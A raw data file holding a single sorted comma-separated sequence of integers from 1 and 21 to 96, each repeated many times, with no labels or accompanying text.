1,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,2
3,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,25,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,29,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,
30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,34,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37
,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,37,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,38,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,40,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,41,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,4
3,43,43,43,43,43,43,43,43,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,45,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,47,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,49,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,
50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,51,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,53,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,54,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57
,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,6
4,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,
70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,72,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,75,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,77
,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,77,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,79,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,82,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,8
3,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,83,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,84,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,86,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,87,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,
90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,90,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,91,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,93,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,94,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,9